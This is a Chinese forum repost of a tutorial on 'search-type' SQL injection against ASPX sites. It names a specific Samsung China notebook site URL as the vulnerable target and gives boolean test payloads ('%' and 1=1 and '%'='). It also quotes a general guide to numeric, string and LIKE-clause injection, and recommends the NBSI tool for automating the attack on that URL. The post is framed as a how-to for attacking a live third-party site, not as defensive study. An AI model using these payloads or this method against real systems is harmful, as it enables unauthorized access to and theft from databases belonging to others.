• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    ASPX搜索型注入

    发布者: 荣9319 | 发布时间: 2025-6-27 16:11| 查看数: 88| 评论数: 0|帖子模式

    樱木花盗's BLOG

    今天看到有个关于搜索型注入的文章,用到的是一种新技术,探测的是三星:http://notebook.samsung.com.cn/index.aspx

    注入方式是:

    一般网站的搜索都是部分匹配的
    有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
    构造注入语句 三星%’and 1=1 and ’%’=’  
                  三星%’and 1=2 and ’%’=’

    大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%’and 1=1 and ’%’=’ 返回时有的


    我们知道一般搜索代码是这么写的:

    Select * from 表名 where 字段 like ’%关键字%’

    这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)

    这里如果关键字没有过滤的话,就可以这样来构造:

    关键字=’ and [查询条件] and ‘%’=’

    这样查询就变成

    select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’

    这样就很好的构成了一个sql注入点,当然用手工也可以,用nbsi也可以~~

    注入是不分家的,没必要什么型什么型的!~

    如果不信,大家请看下面的《sql注入天书》的原话

    第一节、SQL注入的一般步骤

    首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。

    其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:

    (A)   ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
    Select * from 表名 where 字段=49
    注入的参数为ID=49 And [查询条件],即是生成语句:
    Select * from 表名 where 字段=49 And [查询条件]


    (B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
    Select * from 表名 where 字段=’连续剧’  
    注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
    Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

    (C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
    Select * from 表名 where 字段like ’%关键字%’  
    注入的参数为keyword=’ and [查询条件] and ‘%’=’, 即是生成语句:
    Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’


    当然手工是麻烦的

    用工具的话,我建议用nbsi的工具比较好,就我感觉只有nbsi结合了这个技术,用别的软体是不能注入的

    注入点只要写:

    http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%

    再加个特征字符就可以了

    来源:https://www.jb51.net/hack/5804.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表